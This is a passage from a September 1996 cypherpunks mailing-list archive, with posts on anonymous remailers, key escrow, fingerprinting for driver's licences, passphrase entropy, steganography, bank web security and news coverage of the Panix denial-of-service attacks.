factors which are known to raise health insurance costs. I've seen some studies
in which these _entirely_ account for the differences... and keep in mind the
rate of health care inflation of the two countries (depending on the study,
either the same or higher for Canada.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 20 Sep 1996 06:19:19 +0800
To: liberty@gate.net
Subject: Re: Judge Kozinski Responds
Message-ID: <01I9NW5EG7388Y4ZFH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"liberty@gate.net"  "Jim Ray" 17-SEP-1996 02:14:28.24
To:	IN%"cypherpunks@toad.com"
CC:	
Subj:	Judge Kozinski Responds

>The statement about anonymous remailers was largely
>accurate.  I'm not sure that the fact that you (or some of
>your associates) are willing to block people from getting
>anonymous mail is a sufficient safeguard.  Some may not be,
>and it only takes one or two who do not adhere to the code
>to make life miserable for the rest of us.
>
>We agree about the need for privacy, but I'm not at all sure
>why the right to send messages anonymously trumps the
>recipient's right to know who's addressing him.  Getting an
>anonymous message--even one that is not harassing or
>threatening--is an invasion of my privacy.  As for

	The essential problem with this viewpoint is that the right the
receiver has is to ignore the message. If he doesn't want to receive
anonymous messages, he should set up a mail filtration program that will
do a good enough job of filtering them out. Spammed messages can be countered
with Internet charging (neccessary anyway for the long-term health of the Net),
as can mailbombing. That leaves individual messages that may be offensive
(including, apparantly in his case, offensive by virtue of being anonymous),
but if offensiveness meant someone should have the right to stop the emission
of speech, that would mean the Christian Coalition would have the right to stop
speech on evolution, the PC types would have the right to stop speech on
genetic differences in intelligence (see Stephen Jay Gould for them on this
issue - even leaving aside racial questions which are separate from the
individual ones), etcetera.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 20 Sep 1996 00:36:40 +0800
To: cypherpunks@toad.com
Subject: SAB_tag
Message-ID: <199609191243.MAA17222@pipe1.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-19-96. NYP: 
 
   "New Method of Internet Sabotage Is Spreading." Markoff. 
 
      Sabotage reported by Panix is spreading and has now 
      occurred at least a dozen other World Wide Web sites 
      around the nation. Officials concede that there is no 
      easy defense against the attack. One said. "I think this 
      is sick, but I guess that is what these guys do." 
 
   "Regulators Turn Spotlight on Cybermoney." 
 
      As concerns grow about electronic money laundering, 
      cybercounterfeiting and bank runs on the Internet, 
      regulators around the world are scurrying to catch up 
      with the rapid development of electronic money. The US 
      plans to announce today two initiatives intended to 
      grapple with the new technology, and in another move,  
      G-7 will examine the international cooperation needed as 
      money moves through the borderless world of the 
      Internet. 
 
   ----- 
 
   http://jya.com/sabtag.txt  (14 kb for 2) 
 
   SAB_tag 
 
 
---------- 
 
 
Pipeline is sluggish due to transition to Mindspring operation. Responses
may be slow or never. Try again after 2000, or forget about it, go Luddite.

 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 20 Sep 1996 06:27:00 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: monkey-wrenching GAK
In-Reply-To: <199609182148.WAA00346@server.test.net>
Message-ID: <Pine.SUN.3.91.960919124210.21961F@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 18 Sep 1996, Adam Back wrote:

> 3) Monkey-wrenching 
> 
> Even with GAK, where you are forced to give the government the keys,
> you can do much to make the job of administering GAK very expensive.
> You start by ensuring that the government can not get your encrypted
> data (the other half of the secret share), so that the key is of no
> use :-)

Another thing you can do: generate huge key pairs all day long and submit 
them to the NSA.  If enough people do this, they will be flooded and 
overworked, of course they may ignore them, etc, or make it hard to do 
so, but if everyone generates a 4K key every hour or two and discards it, 
but gives the key pair to the NSA anyway, they will run out of storage 
space, or at least it will make it much much harder for them to figgure 
out which key you are using for conversation X.

You can also generate a lot of /dev/null traffic by sending encrypted 
random garbage through remailers signed and encrypted with those random 
discard keys - apparently to yourself - but instruct the xth remailer in 
the chain to just drop it.

Make it hard for them to know which of your 10000 keys is the one you 
truly use. :)

This assumes many many things: like you are allowed to generate your own 
key, you are allowed to make the submissions electronically to the NSA, 
etc, so caveat emptors are all over the place here. :)  Still, it's one 
suggestion.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Fri, 20 Sep 1996 06:54:07 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199609191230.FAA09141@sirius.infonex.com>
Message-ID: <Pine.BSI.3.91.960919124208.10336A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Sep 1996, Mixmaster wrote:

> "Drivers Must Allow Fingerprinting"

> "'I have grave concerns,' she said. 'When we think of giving a fingerprint, 
> we think of being arrested. We feel like we've done something wrong, 
> not because we are complying with the law and are doing something 
> right.'

> "There will be no exceptions to the fingerprint requirement..., Wright said,
> adding that 'having a driver's license is a privilege,' not a right.

    I always find it ironic when government representatives such as this 
individual feel that they can put on an air of superiority by saying that 
we, the public, are privledged to be able to do something at all.  
Apparently they forget that not only are we the reason they have a job, 
but we're the reason for government, period.

> "Wright said...the fingerprints eventually will be available to other law 
> enforcement agencies and courts....

    Of course!  Along with our escrowed encryption keys and 'classified' 
dossiers.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
             'DISA information shows that computer attacks on the 
          Department of Defense are successful 65 percent of the time.
        The DoD, despite its problems, probably has one of the strongest
         computer security programs in government.' -GAO/T-AIMD-96-108





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike van der Merwe <mikev@is.co.za>
Date: Thu, 19 Sep 1996 22:52:56 +0800
To: cypherpunks@toad.com
Subject: CIA hacked
Message-ID: <Pine.GSO.3.95.960919130705.28208H-100000@admin.is.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi everybody

Heh! This one's good for a laugh :-))

http://www.odci.gov/cia

Seems the DOJ hack was a good inspiration. Heh! Life's good when you're
willing to work at it.

Later
Mike

____________________________________________________________________
I'm sure we will find out in a few years that Microsoft invented the
Net.  Or brought it to the masses.  Or saved it from a certain and
early demise.  Or all of the above. 
     JAMES SEYMOUR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 20 Sep 1996 07:29:52 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks is dead anyway... (was Cypherpunk Enquirer)
In-Reply-To: <199609190441.AAA12078@dhp.com>
Message-ID: <199609191739.NAA21396@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



The Enquirer wrote...
> Scientists flocked to toad.com recently in response to the first
> authenticated sighting of a Perrygram in months.  The Perrygram,
> only recently thought extinct, was spotted on the cypherpunks
> mailing list after an absence of several months.  Specialists
> speculate that it may have detected the recent list increase in its
> favorite food - pure, unadulterated bullshit.

In fact, Perrygrams are dead because I've given up on this list.
There is no more cryptography discussion going on -- the list is
basically a very low grade political rant forum, with most of the
rants having no relevance to crypto.

(I suppose "I told you so" doesn't help much.)

Anyway, as soon as I find a home for Cypherpunks Mark II I'm starting
it and unsubscribing from here. Cypherpunks is dead. This happens to
all mailing lists eventually. I suppose it had to happen here.

(Finding a new list home has been a low priority project for me
recently because I've been busy with "real work" -- however, if you
run (I emphasize *run*) a well connected site and can handle a list
with 1500 subscribers or so, and don't mind a somewhat more
restrictive charter than "post anything you like at any time", please
get in touch.)


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 20 Sep 1996 07:55:01 +0800
To: cypherpunks@toad.com
Subject: Re: monkey-wrenching GAK
Message-ID: <ae6702a10202100484d8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:46 PM 9/19/96, Ray Arachelian wrote:

>Another thing you can do: generate huge key pairs all day long and submit
>them to the NSA.  If enough people do this, they will be flooded and
>overworked, of course they may ignore them, etc, or make it hard to do
>so, but if everyone generates a 4K key every hour or two and discards it,
>but gives the key pair to the NSA anyway, they will run out of storage
>space, or at least it will make it much much harder for them to figgure
>out which key you are using for conversation X.

Ah, but what about the _fee_ for registering a key? You really didn't think
this would be free, did you?

(It costs money to register cars, guns, etc., so why would it be "free" to
register a key?)

Besides being a revenue enhancement tool, charging a fee stops this sort of
flooding attack.

(Note: One of my biggest objections to GAK, besides the political/civil
rights issue, is what it does to systems which generate lots and lots of
keys on an ad hoc, continuing basis. GAK, if enforced, puts a major speed
bump in the way and increases costs, possibly making certain kinds of
systems infeasible.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 20 Sep 1996 06:51:33 +0800
To: Batman <batman@infomaniak.ch>
Subject: Re: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building
In-Reply-To: <01BBA60C.5AD5CCC0@misd145.cern.ch>
Message-ID: <199609191753.NAA21446@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Batman writes:
> For the 200th time, unsubscrive me of your fucked mail lists.

Never. I will *never* unsubscrive you from anything.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Thu, 19 Sep 1996 23:46:32 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Mercenaries
In-Reply-To: <ae65693e0e021004fa1e@[207.167.93.63]>
Message-ID: <Pine.GSO.3.93.960919144018.4922B-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Wed, 18 Sep 1996, Timothy C. May wrote:

> As to Michelle's point that Americans cannot serve for pay in other
> militaries, there are all sorts of waivers and "look the other way"s
> involved. For example, the retired American officer who became the top
> military man in Estonia (or one of the Baltic States)--while still
> retaining his U.S. citizenship.

General Aleksander Einseln had some problems with US authorities because
of working as the head of Estonian Army, I am not sure if he lost his US
pension or not, at least that was what the US promised to do.

He is having problems in Estonia right now BTW, some days ago the security
police took him to interrogate him in the defense forces headquarters
weapons smuggling case. That happened some days after he announced his
consent to stand as the candidate for President of Estonia. This kind of
bad attention did not allow him to set up his candidacy. 

No relevance to CP, I know :)

Jüri Kaljundi
AS Stallion
jk@stallion.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Fri, 20 Sep 1996 10:08:39 +0800
To: "'Gary Howland'" <gary@systemics.com>
Subject: RE: Private key server
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-960919220239Z-15526@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


Gary Howland[SMTP:gary@systemics.com] wrote:
f_estema@alcor.concordia.ca wrote:
>
> On Wed, 18 Sep 1996, Gary Howland wrote:
>
> > If you really want this functionality, a nicer solution is to use your
> > passphrase as a seed to the key generator - that way you never need
>
> So much for entropy. If you can actually remember your seed generator, 
it
> can't be that random, can it?

I don't know about you, but I can certainly remember enough bits to be
secure.  The fact that passphrases are so widely used goes to show that
I'm not the only one that can do this.

[Darth Vader voice:] "Don't overestimate the entropy of your passphrase"

Let's see, 128 bits (say) of info, mapped comfortably into the upper case 
letters and digits (5 bits/char), means a string of about 26 *really 
random* characters.  An example might be "KQI8CH49SCK3PKWNA37AYV9QJ5".  If 
that just rolls off your toungue, you have my respect (and I have pi 
memorized to 110 decimal places!)  This assumes a full 5 bits of 
entropy/character.  If your passphrase is more coherent (i.e., less 
entropy) than that, like "Strange kr0ws fly 1azily at MIDnight", it almost 
certainly contains _far_ less entropy than that.  128 bits of truly 
arbitrary (random) info is a fair amount of information to comfortably 
remember.

Mind you, I think a properly constructed passphrase (like the one above) is 
pretty darn resistant against any sort of reasonable dictionary or 
quasi-brute force attack.  But I don't think it's got anywhere near, say, 
128 bits of entropy.  Probably closer to half that.

Anyway, the point I was making that this method would be preferable to a
"secret key server".  My proposal would offer the same security, would
it not?

(The secret key server is arguably less secure than generating keys from
passphrases, since key generation takes longer than IDEA decryption -
however, they are still of the same order).

Using a pass phrase to seed key generation (or more directly, using the 
hash of a pass phrase as a key) does not increase the entropy, of course. 
 Not sure if this is relevant to your claim, as I've sort of lost track of 
the original context!

Best regards,

Gary

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================



begin 600 WINMAIL.DAT
M>)\^(BH6`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$(@ <`
M& ```$E032Y-:6-R;W-O9G0@36%I;"Y.;W1E`#$(`06 `P`.````S <)`!,`
M#P`"`"<`! `K`0$@@ ,`#@```,P'"0`3``\``@`H``0`+ $!"8 !`"$```!#
M14-"1C@T1#)$,3)$,#$Q.3,P-C P04$P,$$U1C8P1 `L!P$-@ 0``@````(`
M`@`!!( !`!<```!213H@4')I=F%T92!K97D@<V5R=F5R`.P'`0.0!@#D"@``
M&@````,`)@```````P`V```````>`' ``0```!,```!0<FEV871E(&ME>2!S
M97)V97(```(!<0`!````&P````&[ID2E\4WXRWL2+1'0DP8`J@"E]@T``$$D
MNP`#`"X```````,`!A"7!9D@`P`'$-D'```>``@0`0```&4```!'05)92$]7
M3$%.1%--5% Z1T%264!365-414U)0U-#3TU74D]413I&15-414U!0$%,0T]2
M0T].0T]21$E!0T%74D]413I/3E=%1"PQ.%-%4#$Y.38L1T%264A/5TQ!3D17
M4D]4``````,`$! ``````P`1$ `````"`0D0`0```-0'``#0!P``GPT``$Q:
M1G7 ,,# _P`*`0\"%0*D`^0%ZP*#`% 3`U0"`&-H"L!S973N,@8`!L,"@S(#
MQ@<3`H/&,P/%`@!P<G$2(!.(]C0/?Q"'-10_!T 'L K E0-@=P*#-A,/9C<$
M1KD4HS$@"%4'L@*#.!=\H0:P<W1E;0*#.036P12E0G)U<V@&``4$O$U4$,0/
M9A2E%DU]"H"+",\)V3LC/S(U-0* IPJ!#;$+8&YG(' S%"!!"P-L:3$T- +1
M:7XM)R,,T"<C"U44(@P!8ZL`013 ;QVP8P5 1PK &'D@2!CP)B%D6U.1( !0
M.F<J$4!S'9.0:6-S+@6@;5TH7^D;<"!W*9(Z+%\I: J+>2<`,S8H1QEB# $I
MAF;F7P>0';%A0 = !:$L`=IN!:%D!S L`&$MA0J%5CXOEC3 3P.@5PF +"@@
M,3@&47 UX#DY/C8UT"H*,^\X!C3 26:T('D(8" C0 = ;"HP9G<`< 5 =&@$
M`#(@=1DS0'1I`B '0&ET>5<UT#/0`P!C&^%S!O!U13KR(#J!=&\@'U!E'3E2
M<CB)"K $$'!H<O\^4#TP/E [D1'P"8 \TCI@:3TP:V4J,&<)\ 208?L\X 7 
M+3I10) Z`2HP.6+]0&!V&^% 8 F -_\&`#SPO&UU$; R( 6Q"?!T`V!X<'DN
M.28SP .@`-!T_G4YPR- !X &T!OA/5(_--] 1S70.U!"=T51)P5 1G!_0/0^
MH"J@`W UT$52.U _,PJ%"H5)($G 2-)K;K\8\#N0!N \4#E2-=!B3&'_2V!%
M4COA`9 +@$7Z"? (8/IG'W!B.U \PT9P"H41\$IC"'!E1, @5#_19G]%D4#T
M/D@_`2- /!$M@&GO#; YX3T11S%O!Y$\X1]@YTP!00)*]B=M.[ IH#^S?P(@
M.>$"($DE15))P#I3+I\*CPN1$O(M%5=U6T0*P!$Z8"!6802!('9O03O1.ET@
M(D1+DV__0?$R40=P0)!)(CTP1%55P%<Y0P7 /D@B2HQ,$@`G-P0@/T$UT3(V
M`$\C*'-]06 I71(+@ (0-= `P'#^<#]A+!%$$0&1.>$+@#^5WG5A@07 ,\ ]
M(6P2`!VPKQ'@.Y W83. 9V S-4\3^B\1LBEA03FP!C$_(41P#0N 9UT23#0R
M-B J^SFE290J14 1P4619!%0D<)!`Z!E>&%M"U ], <KP$[P2/,B2U%). !#
M2#0Y4T-+,P!02U=.03,W08!95CE12C4B4)&[.3%!`VH?4$EQ!O!L!"#O72!=
M-3S@.L!G"E UT#EBOQ' 0?!#L$8"/G IPB@W4G-+8&\S<&EEX01@!1!Z_3]D
M,2!P2W %D%P!`R +47D[X',A8+!0L3J!/E%U[P>",] ZL#G0(&4471)$5?]E
M<VCC;'1=73RB<4$], 6@QS_0(T Z,2AI+E" -=#_8] $$4158+!!`0.@00)Y
M`79I0 !;$%-$<"8Q/^%RC#!W.I$YX3%A>@,08RHP02%-240#`&I!(OM'XCN0
M; 1@;4%-B#,A3;+E!"!?40!R7WD;>?A0D=]?YUTA1'!T4'R!<D\A/J#]*B$H
M291@L&$"/*)T(0MPWP7 :<!N<5MQ8.1R7!$\<M\\X6':1B979E=U30N -W#G
M3)-+8#IA;FL[D2F!8T&_?I1F<4/0'; W<#Y)*'JS_U64/M$&X$'P@W$$(!3 
M8^']*C!D"L #H%O!! `!D#HQ[F$K('\1?9%N*C \( `@_UT2.:$\(#L@`F ]
M,#. .N2;*B$%L7%%P "0+6(?0)]<,401.^!\D0&08VM0D?Y"3/-+A(D$.U!?
M85.0CL/^=WA"0<$*P#708(%?R74(U5"14 -@8F)#8R+0$?#[;D)O(6QLM%=L
M,'\QB5=U[VEPE+"5DC_"<%JP.C%+8/,Z$'>Q86MFHD$#.F,'@.\Z8 1P+8 (
M8&PW<$D1C0&N9D!QD!(\X6%7=2)0,=^-$3_SE_%!\6QB32HPB8+_?> 8@9\$
M;=&8`C_18( '@']0)#M3GP-7=7V!55%*?2CW4,*A#X/3<FZ@8D-Y(U T_WGT
M0$5FHD !.I$#85=U4:G_E6$+@)(A0 F%HYV0!Y$BT,][4:.R`Y%\X$5!<B(J
M(/L%,#QR+5=U5"%!XIQC@D)_4H$Z\'1A@=*CYC-A!) I]U=O6'^SDU6LT6; 
MB6$^4=\^,#Z44^(_4JT]* 6Q=]/_,X C0"G0.> UT!]0G;0],/\1P!]A9N*V
M2S[S0 %@L$G _P>155*LX8^B7$LUT%TA!:#W"' 1\%"13E5A<\!2<0:0[SI4
M.H$C0&/0=CHC//!&L_^7P MP2>$^\540;U&/)I?1_SI!:-&)0+)%<5%DL#LA
M?K.Y::!T(4J,F7^:CT(R4?LYD2LA9*R@2HPJ`K-_M(_]RA)4.L".\,GO"Y$:
MD3%Z7CW.S\_?T._1_SW,E2#^2J0A$V%$P,Q"*] G`*.!&2UP('PUD-4P96(Z
M@V\@`D!P.B\O=]80GBYA`7A2.^ L`B]^1;#OS&@Y(-9F&X%RG,"MM=4!X%!'
M4"!&9J$$D!3 %V*1U8 M<$.O<#(S($I%$B!&VQ!!0V=@1&0@,-N@-S?3)M=#
M0/_8%RP"U.'5`=Y/+7#&4-O@L#<@1#G?<-L0,]O0RC,2(#7;$#E#S)72'[_B
M;^-_Y(_3!\R5(F$`YN! `#D`\#\O1G:FNP$#`/$_"00```(!1P`!````,@``
M`&,]55,[83T@.W ]26YF97)E;F-E.VP]3$%.1%)5+3DV,#DQ.3(R,#(S.5HM
M,34U,C8````"`?D_`0```$H`````````W*= R,!"$!JTN0@`*R_A@@$`````
M````+T\]24Y&15)%3D-%+T]5/4Y/5D%43R]#3CU214-)4$E%3E13+T-./515
M3DY9````'@#X/P$````5````2F%M97,@02X@5'5N;FEC;&EF9F4``````@'[
M/P$```!*`````````-RG0,C 0A :M+D(`"LOX8(!`````````"]//4E.1D52
M14Y#12]/53U.3U9!5$\O0TX]4D5#25!)14Y44R]#3CU454Y.60```!X`^C\!
M````%0```$IA;65S($$N(%1U;FYI8VQI9F9E`````$ `!S!@L\PQ1J:[`4 `
M"## A(]&=J:[`0,`#33]/P```@$4- $````0````5)2AP"E_$!NEAP@`*RHE
M%QX`/0`!````!0```%)%.B `````"P`I```````+`",```````(!?P`!````
M40```#QC/553)6$]7R5P/4EN9F5R96YC925L/4Q!3D1252TY-C Y,3DR,C R
M,SE:+3$U-3(V0&QA;F1R=2YN;W9A=&\N:6YF97)E;F-E,BYC;VT^``````>;
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 20 Sep 1996 09:08:23 +0800
To: cypherpunks@toad.com
Subject: Re: DL in exchange for fingerprint
Message-ID: <ae67137f030210047b42@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:13 PM 9/19/96, Gary Howland wrote:
>Timothy C. May wrote:
>>
>> (Yes, I disliked being thumb-printed, but I could see no viable
>> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan
>> exchange student, but I decided being thumb-printed was the lesser hassle.)
>
>Sure, it's always less hassle doing what they want.  Privacy doesn't
>come for free.  It's easier to let the police search you in the street
>than it is to make them arrest you so that you can make a formal
>complaint.

So, just what it is _your_ method of dealing with this? While it is noble
to talk about fighting the system, just how do you go about doing it
yourself?

Do you simply drive without a valid driver's license? I know some folks who
do, of course, but it's not something that's "worth it" to me.

(This space reserved for your lecture about how I need to be prepared to go
to jail to defend my right not to be thumbprinted, etc. On second thought,
why don't you be the one to go to jail, and then you can let us know your
experiences.)


>> Paraphrasing that famous quote, just which part of "not for identification"
>> don't they understand?
>
>Hmm - who are you paraphrasing here? (Just curious).

"What part of "No" don't you understand?"

and

"What part of "Congress shall make no law" don't you understand?"

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rolf Weber <weber@iez.com>
Date: Fri, 20 Sep 1996 01:11:58 +0800
To: felipe@xs4all.nl (Felipe Rodriquez)
Subject: Re: GLOBAL ALERT: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES
In-Reply-To: <199609181645.SAA29420@xs1.xs4all.nl>
Message-ID: <9609191310.AA11909@spibm02>
MIME-Version: 1.0
Content-Type: text/plain


i absolutely agree with what you said, but let me correct
this misunderstanding:
> 
>         GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES.
>   
it was *not* the german government, it was the public prosecutor
general, who pushed this blockage.
the german government recently said, that ISPs shouldn't (and aren't!)
be responsible for what they're transmitting.
but like other democratic states, in germany the public prosecutor
is independant from government...

rolf
-- 
-----------------------------------------
Rolf Weber <weber@iez.com> | All I ask is a chance
IEZ AG   D-64625 Bensheim  | to prove that money
++49-6251-1309-109         | can't make me happy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 20 Sep 1996 10:21:10 +0800
To: cypherpunks@toad.com
Subject: Commentary on news coverage of attacks
Message-ID: <01I9O1AWQ91S8Y4ZFQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I thought it was interesting to note what got deleted - namely
cryptographic (signature) protection against such attacks - and what got
included - namely faked addresses. You can get the original NYT version via
JYA.
	-Allen

>     _________________________________________________________________
>   webslingerZ
>     _________________________________________________________________
>            CONCERN AT RASH OF ATTACKS BY HACKERS ON INTERNET SITES
>   __________________________________________________________________________
                                       
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Financial Times
      
>   SAN FRANCISCO (Sep 19, 1996 00:23 a.m. EDT) -- A rash of hacker
>   attacks on commercial Internet sites -- including one in which the
>   services of Panix, a New York-based Internet access provider, were
>   seriously disrupted -- has raised new concerns about the security and
>   reliability of the worldwide computer network.
   
[...]

>   Attacks have been "isolated incidents," said Pete Solvik,
>   vice-president of information systems at Cisco Systems, the leading
>   manufacturer of routing equipment for the Internet. The company,
>   however, is concerned that the problem could spread, disrupting
>   Internet service for millions of users and effectively closing down
>   large commercial sites on the Internet.
   
>   With many banks and retailers now planning Internet services, the
>   potential for financial losses as a result of such attacks is rising.
>   Disruption of Internet service can also be a serious problem for the
>   tens of thousands of businesses that now rely on electronic mail and
>   sites on the World Wide Web to communicate with their partners and
>   customers.
   
>   The impact of a large-scale "denial-of-service attack" can be
>   devastating, said Solvik. Within a minute, a computer linked to the
>   Internet can be completely overwhelmed and it may take days before
>   service can be restored.
   
[...]

>   Because the attacks came from fake addresses on the Internet, it was
>   "impossible to trace the source without a major effort on the part of
>   all Internet service providers between Panix and the attacking party,"
>   said Rosen.
   
>   "The nature of the Internet, which is designed to let machines
>   communicate with a minimum exchange of identifying information, makes
>   every site on the Internet vulnerable," said Rosen.
   
>   The Federal Bureau of Investigation's New York Computer Investigations
>   Threat Assessment Center is understood to be investigating the attack
>   on Panix. Computer Emergency Response Teams, a US organization that
>   collates information about security and technical problems on the
>   Internet, are looking into the incident.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Fri, 20 Sep 1996 06:49:14 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Stego inside encryption
Message-ID: <n1368976385.63324@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


My apologies if this shows up twice.  I got an error message from my
first posting.
***************

I know a lot of times the idea behind steganography is to hide the fact that a
secret message is in a seemingly normal file/mail/whatever.  This is good
for avoiding unwanted interest in your file.  The benefit of not having people
attempt to crack you code, added to the strength of the cryptosystem is
wonderful.  However, I propose this--

Don't hide that anything's encrypted!  Rather than hide this fact, throw it
in their face!  I propose hiding an encrypted message inside another 
encrypted message.  Set bits in specific places to data in the real message.
The benefit is Oscar not only doesn't know what the crypto is, he attacks
the wrong message.  Hiding statistically random bits from the true message
in statistically random bits from the masking message shouldn't be too 
hard.

Granted, this scheme doesn't get you past measures designed to keep out all
encrypted messages, and it surely wouldn't keep you message from generating
interest, but it would be very hard to decrypt the message, especially when 
some algorithm is used which (seemingly) randomly selects which bits to use 
for the stego.

Just a thought...  My apologies if someone has already proposed this method.

Patrick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Thu, 19 Sep 1996 15:16:46 +0800
To: cypherpunks@toad.com
Subject: Banking over the net
Message-ID: <199609190520.PAA18516@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


     For some time several Australian Banks have been interested in 
setting up online banking via the web. Currently the Commonwealth 
Bank does have online banking, but on non-internetworked servers. 
This requires an encrypted password. 
     Currently this involves logging into the bank server directly 
transfering the password, at which case the user has access to their 
accounts. The unfortunate details are that the instructions for the 
account are not sent encrypted. Apart from the initial password, 
all data is sent plain text.
      There is likely to be implemented an inital web trial of this 
service in December this year. Hopefully the security will be 
upgraded a little. Where this is not likely is that the likely 
canditate for encryption over the net is going to be 40bit netscape 
(as what bank wants to go against the wishes of the US gov). 
      The banks feel secure in that they are providing a 128bit 
secured password to the customer via mail. This seems to be the end 
of the security. While the average member of the public blindly 
trusts the banks to keep them safe, and untill there is a user 
friendly means of encrypting data (that the US government supports), 
I can see alot of room for fraud.

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 20 Sep 1996 16:00:27 +0800
To: cypherpunks@toad.com
Subject: Re: LEOs running anon servers?
Message-ID: <ae677c03080210040999@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:15 AM 9/20/96, "Michael Froomkin - U.Miami School of Law"
<froomkin@law.miami. wrote:
>This claim was made at a symposium held at Harvard by a sometime lecturer
>at the National Defense college.  He later denied it.  Since lots of other
>things he said in the same lecture were plainly false (more likely his
